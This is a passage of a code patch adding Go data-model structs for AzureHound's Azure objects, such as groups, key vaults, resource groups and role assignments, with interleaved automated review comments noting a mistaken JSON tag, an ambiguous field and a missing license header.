@@ -0,0 +1,44 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "encoding/json" +) + +type GroupMember struct { + Member json.RawMessage `json:"member"` + GroupId string `json:"groupId"` +} + +func (s *GroupMember) MarshalJSON() ([]byte, error) { + output := make(map[string]any) + output["groupId"] = s.GroupId + + if member, err := OmitEmpty(s.Member); err != nil { + return nil, err + } else { + output["member"] = member + return json.Marshal(output) + } +} + +type GroupMembers struct { + Members []GroupMember `json:"members"` + GroupId string `json:"groupId"` +} diff --git a/models/group-owner.go b/models/group-owner.go new file mode 100644 index 0000000..a7a48fe --- /dev/null +++ b/models/group-owner.go 
@@ -0,0 +1,44 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "encoding/json"
+)
+
+type GroupOwner struct {
+ Owner json.RawMessage `json:"owner"`
+ GroupId string `json:"groupId"`
+}
+
+func (s *GroupOwner) MarshalJSON() ([]byte, error) {
+ output := make(map[string]any)
+ output["groupId"] = s.GroupId
+
+ if owner, err := OmitEmpty(s.Owner); err != nil {
+ return nil, err
+ } else {
+ output["owner"] = owner
+ return json.Marshal(output)
+ }
+}
+
+type GroupOwners struct {
+ Owners []GroupOwner `json:"owners"`
+ GroupId string `json:"groupId"`
+}
diff --git a/models/group.go b/models/group.go
new file mode 100644
index 0000000..48cef3a
--- /dev/null
+++ b/models/group.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+type Group struct {
+ azure.Group
+ TenantId string `json:"tenantId"`
+ TenantName string `json:"tenantName"`
+}
diff --git a/models/ingest-request.go b/models/ingest-request.go
new file mode 100644
index 0000000..6ba0dba
--- /dev/null
+++ b/models/ingest-request.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+type IngestRequest struct {
+ Meta Meta `json:"meta"`
+ Data interface{} `json:"data"`
+}
+
+type Meta struct {
+ Type string `json:"type"`
+ Version int `json:"version"`
+ Count int `json:"count"`
+}
diff --git a/models/job.go b/models/job.go
new file mode 100644
index 0000000..e562e7c
--- /dev/null
+++ b/models/job.go
@@ -0,0 +1,62 @@
+package models
+
+import "time"
+
+type CompleteJobRequest struct {
+ Status string `json:"status"`
+ StatusEnum JobStatus `json:"-"`
+ Message string `json:"message"`
+}
+
+type JobStatus int
+
+const (
+ JobStatusInvalid JobStatus = -1
+ JobStatusReady JobStatus = 0
+ JobStatusRunning JobStatus = 1
+ JobStatusComplete JobStatus = 2
+ JobStatusCanceled JobStatus = 3
+ JobStatusTimedOut JobStatus = 4
+ JobStatusFailed JobStatus = 5
+ JobStatusIngesting JobStatus = 6
+)
+
+func (s JobStatus) String() string {
+ switch s {
+ case JobStatusReady:
+ return "READY"
+
+ case JobStatusRunning:
+ return "RUNNING"
+
+ case JobStatusComplete:
+ return "COMPLETE"
+
+ case JobStatusCanceled:
+ return "CANCELED"
+
+ case JobStatusTimedOut:
+ return "TIMEDOUT"
+
+ case JobStatusFailed:
+ return "FAILED"
+
+ case JobStatusIngesting:
+ return "INGESTING"
+
+ default:
+ return "INVALIDSTATUS"
+ }
+}
+
+type ClientJob struct {
+ ID int `json:"id"`
+ ClientID string `json:"client_id"`
+ ClientName string `json:"client_name"`
+ ClientScheduleID int `json:"event_id"`
+ ExecutionTime time.Time `json:"execution_time"`
+ StartTime time.Time `json:"start_time"`
+ EndTime time.Time `json:"end_time"`
+ Status JobStatus `json:"status"`
+ StatusMessage string `json:"status_message"`
+}
diff --git a/models/key-vault-access-policy.go b/models/key-vault-access-policy.go
new file mode 100644
index 0000000..ff558ea
--- /dev/null
+++ b/models/key-vault-access-policy.go
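Review bot: `JobStatus` gets a `String` method but no `MarshalJSON`/`UnmarshalJSON` in this hunk, so `ClientJob.Status` travels as a bare integer while `CompleteJobRequest.Status` is a string, and an integer outside the declared constants decodes without error and only surfaces as "INVALIDSTATUS" when printed. A doc comment on the type would make that contract explicit, for example `// JobStatus is encoded as its integer value; values outside the declared constants print as "INVALIDSTATUS".`, and code that branches on a decoded status should reject unknown values rather than fall through. `ClientScheduleID` is tagged `event_id`; if that naming is deliberate a short field comment would save the next reader a lookup. This file is also the only one in this part of the patch without the license header the other models carry.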
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type KeyVaultAccessPolicy struct {
+ azure.AccessPolicyEntry
+ KeyVaultId string `json:"keyVaultId"`
+}
diff --git a/models/key-vault-contributor.go b/models/key-vault-contributor.go
new file mode 100644
index 0000000..c952ff1
--- /dev/null
+++ b/models/key-vault-contributor.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type KeyVaultContributor struct {
+ Contributor azure.RoleAssignment `json:"contributor"`
+ KeyVaultId string `json:"keyVaultId"`
+}
+
+type KeyVaultContributors struct {
+ Contributors []KeyVaultContributor `json:"contributors"`
+ KeyVaultId string `json:"keyVaultId"`
+}
diff --git a/models/key-vault-kvcontributor.go b/models/key-vault-kvcontributor.go
new file mode 100644
index 0000000..8cefbba
--- /dev/null
+++ b/models/key-vault-kvcontributor.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type KeyVaultKVContributor struct {
+ KVContributor azure.RoleAssignment `json:"kvContributor"`
+ KeyVaultId string `json:"keyVaultId"`
+}
+
+type KeyVaultKVContributors struct {
+ KVContributors []KeyVaultKVContributor `json:"kvContributors"`
+ KeyVaultId string `json:"keyVaultId"`
+}
diff --git a/models/key-vault-owner.go b/models/key-vault-owner.go
new file mode 100644
index 0000000..4fec73a
--- /dev/null
+++ b/models/key-vault-owner.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type KeyVaultOwner struct {
+ Owner azure.RoleAssignment `json:"owner"`
+ KeyVaultId string `json:"keyVaultId"`
+}
+
+type KeyVaultOwners struct {
+ Owners []KeyVaultOwner `json:"owners"`
+ KeyVaultId string `json:"keyVaultId"`
+}
diff --git a/models/key-vault-role-assignment.go b/models/key-vault-role-assignment.go
new file mode 100644
index 0000000..2d9700f
--- /dev/null
+++ b/models/key-vault-role-assignment.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type KeyVaultRoleAssignment struct {
+ RoleAssignment azure.RoleAssignment `json:"roleAssignment"`
+ KeyVaultId string `json:"virtualMachineId"`
+}
+
+type KeyVaultRoleAssignments struct {
+ RoleAssignments []KeyVaultRoleAssignment `json:"roleAssignments"`
+ KeyVaultId string `json:"virtualMachineId"`
+}
diff --git a/models/key-vault-user-access-admin.go b/models/key-vault-user-access-admin.go
new file mode 100644
index 0000000..5a413f9
--- /dev/null
+++ b/models/key-vault-user-access-admin.go
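Review bot: Both `KeyVaultId` fields in models/key-vault-role-assignment.go carry the tag `json:"virtualMachineId"`, which looks like a copy-paste from a virtual-machine model; every other key-vault model in this patch (`KeyVaultOwner`, `KeyVaultContributor`, `KeyVaultKVContributor`, `KeyVaultUserAccessAdmin`, `KeyVaultAccessPolicy`) uses `json:"keyVaultId"`. As written, key vault role-assignment records are emitted under a VM key, so a consumer that keys on the field name could attribute them to the wrong resource type or lose the vault id, which matters when the output is used to audit who holds rights on a vault. If nothing downstream already depends on the current name, change both tags to `json:"keyVaultId"`; otherwise add a comment on the fields saying the mismatch is deliberate and why.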
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type KeyVaultUserAccessAdmin struct {
+ UserAccessAdmin azure.RoleAssignment `json:"userAccessAdmin"`
+ KeyVaultId string `json:"keyVaultId"`
+}
+
+type KeyVaultUserAccessAdmins struct {
+ UserAccessAdmins []KeyVaultUserAccessAdmin `json:"userAccessAdmins"`
+ KeyVaultId string `json:"keyVaultId"`
+}
diff --git a/models/key-vault.go b/models/key-vault.go
new file mode 100644
index 0000000..cadefd1
--- /dev/null
+++ b/models/key-vault.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type KeyVault struct {
+ azure.KeyVault
+ SubscriptionId string `json:"subscriptionId"`
+ ResourceGroup string `json:"resourceGroup"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/logic-app.go b/models/logic-app.go
new file mode 100644
index 0000000..dbe83eb
--- /dev/null
+++ b/models/logic-app.go
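Review bot: The `ResourceGroup` field on `KeyVault` (tag `resourceGroup`) does not say whether it holds the resource group's id or its name, and it breaks the pattern of the sibling models in this patch: `FunctionApp`, `LogicApp` and `StorageAccount` carry `ResourceGroupId` plus `ResourceGroupName`, and `ManagedCluster` carries `ResourceGroupId`. Anything that joins vaults to their resource group on this value has to guess which form it is. I would add a one-line field comment stating which of the two it contains, and, if the output format can still change, align the field and tag with the `ResourceGroupId`/`ResourceGroupName` pair used elsewhere.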
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type LogicApp struct {
+ azure.LogicApp
+ SubscriptionId string `json:"subscriptionId"`
+ ResourceGroupId string `json:"resourceGroupId"`
+ ResourceGroupName string `json:"resourceGroupName"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/managed-cluster.go b/models/managed-cluster.go
new file mode 100644
index 0000000..62b9bee
--- /dev/null
+++ b/models/managed-cluster.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type ManagedCluster struct {
+ azure.ManagedCluster
+ SubscriptionId string `json:"subscriptionId"`
+ ResourceGroupId string `json:"resourceGroupId"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/management-group-owner.go b/models/management-group-owner.go
new file mode 100644
index 0000000..78aab80
--- /dev/null
+++ b/models/management-group-owner.go
@@ -0,0 +1,32 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+type ManagementGroupOwner struct {
+ Owner azure.RoleAssignment `json:"owner"`
+ ManagementGroupId string `json:"managementGroupId"`
+}
+
+type ManagementGroupOwners struct {
+ Owners []ManagementGroupOwner `json:"owners"`
+ ManagementGroupId string `json:"managementGroupId"`
+}
diff --git a/models/management-group-role-assignment.go b/models/management-group-role-assignment.go
new file mode 100644
index 0000000..b9bceec
--- /dev/null
+++ b/models/management-group-role-assignment.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type ManagementGroupRoleAssignment struct {
+ RoleAssignment azure.RoleAssignment `json:"roleAssignment"`
+ ManagementGroupId string `json:"managementGroupId"`
+}
+
+type ManagementGroupRoleAssignments struct {
+ RoleAssignments []ManagementGroupRoleAssignment `json:"roleAssignments"`
+ ManagementGroupId string `json:"managementGroupId"`
+}
diff --git a/models/management-group-user-access-admin.go b/models/management-group-user-access-admin.go
new file mode 100644
index 0000000..7b26964
--- /dev/null
+++ b/models/management-group-user-access-admin.go
@@ -0,0 +1,32 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+type ManagementGroupUserAccessAdmin struct {
+ UserAccessAdmin azure.RoleAssignment `json:"userAccessAdmin"`
+ ManagementGroupId string `json:"managementGroupId"`
+}
+
+type ManagementGroupUserAccessAdmins struct {
+ UserAccessAdmins []ManagementGroupUserAccessAdmin `json:"userAccessAdmins"`
+ ManagementGroupId string `json:"managementGroupId"`
+}
diff --git a/models/mgmt-group.go b/models/mgmt-group.go
new file mode 100644
index 0000000..17de25e
--- /dev/null
+++ b/models/mgmt-group.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+type ManagementGroup struct {
+ azure.ManagementGroup
+ TenantId string `json:"tenantId"`
+ TenantName string `json:"tenantName"`
+}
diff --git a/models/resource-group-owner.go b/models/resource-group-owner.go
new file mode 100644
index 0000000..31bfbb7
--- /dev/null
+++ b/models/resource-group-owner.go
@@ -0,0 +1,32 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+type ResourceGroupOwner struct {
+ Owner azure.RoleAssignment `json:"owner"`
+ ResourceGroupId string `json:"resourceGroupId"`
+}
+
+type ResourceGroupOwners struct {
+ Owners []ResourceGroupOwner `json:"owners"`
+ ResourceGroupId string `json:"resourceGroupId"`
+}
diff --git a/models/resource-group-role-assignment.go b/models/resource-group-role-assignment.go
new file mode 100644
index 0000000..3db7b63
--- /dev/null
+++ b/models/resource-group-role-assignment.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type ResourceGroupRoleAssignment struct {
+ RoleAssignment azure.RoleAssignment `json:"roleAssignment"`
+ ResourceGroupId string `json:"resourceGroupId"`
+}
+
+type ResourceGroupRoleAssignments struct {
+ RoleAssignments []ResourceGroupRoleAssignment `json:"roleAssignments"`
+ ResourceGroupId string `json:"resourceGroupId"`
+}
diff --git a/models/resource-group-user-access-admin.go b/models/resource-group-user-access-admin.go
new file mode 100644
index 0000000..3751f9f
--- /dev/null
+++ b/models/resource-group-user-access-admin.go
@@ -0,0 +1,32 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+type ResourceGroupUserAccessAdmin struct {
+ UserAccessAdmin azure.RoleAssignment `json:"userAccessAdmin"`
+ ResourceGroupId string `json:"resourceGroupId"`
+}
+
+type ResourceGroupUserAccessAdmins struct {
+ UserAccessAdmins []ResourceGroupUserAccessAdmin `json:"userAccessAdmins"`
+ ResourceGroupId string `json:"resourceGroupId"`
+}
diff --git a/models/resource-group.go b/models/resource-group.go
new file mode 100644
index 0000000..fa2bb67
--- /dev/null
+++ b/models/resource-group.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type ResourceGroup struct {
+ azure.ResourceGroup
+ SubscriptionId string `json:"subscriptionId"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/role-assignments.go b/models/role-assignments.go
new file mode 100644
index 0000000..ad93799
--- /dev/null
+++ b/models/role-assignments.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+type RoleAssignments struct {
+ RoleAssignments []azure.UnifiedRoleAssignment `json:"roleAssignments"`
+ RoleDefinitionId string `json:"roleDefinitionId"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/role.go b/models/role.go
new file mode 100644
index 0000000..71750e7
--- /dev/null
+++ b/models/role.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+type Role struct {
+ azure.Role
+ TenantId string `json:"tenantId"`
+ TenantName string `json:"tenantName"`
+}
diff --git a/models/service-principal-owner.go b/models/service-principal-owner.go
new file mode 100644
index 0000000..bb44eb0
--- /dev/null
+++ b/models/service-principal-owner.go
@@ -0,0 +1,44 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "encoding/json"
+)
+
+type ServicePrincipalOwner struct {
+ Owner json.RawMessage `json:"owner"`
+ ServicePrincipalId string `json:"servicePrincipalId"`
+}
+
+func (s *ServicePrincipalOwner) MarshalJSON() ([]byte, error) {
+ output := make(map[string]any)
+ output["servicePrincipalId"] = s.ServicePrincipalId
+
+ if owner, err := OmitEmpty(s.Owner); err != nil {
+ return nil, err
+ } else {
+ output["owner"] = owner
+ return json.Marshal(output)
+ }
+}
+
+type ServicePrincipalOwners struct {
+ Owners []ServicePrincipalOwner `json:"owners"`
+ ServicePrincipalId string `json:"servicePrincipalId"`
+}
diff --git a/models/service-principal.go b/models/service-principal.go
new file mode 100644
index 0000000..61a6977
--- /dev/null
+++ b/models/service-principal.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type ServicePrincipal struct {
+ azure.ServicePrincipal
+ TenantId string `json:"tenantId"`
+ TenantName string `json:"tenantName"`
+}
diff --git a/models/storage-account.go b/models/storage-account.go
new file mode 100644
index 0000000..ff73499
--- /dev/null
+++ b/models/storage-account.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
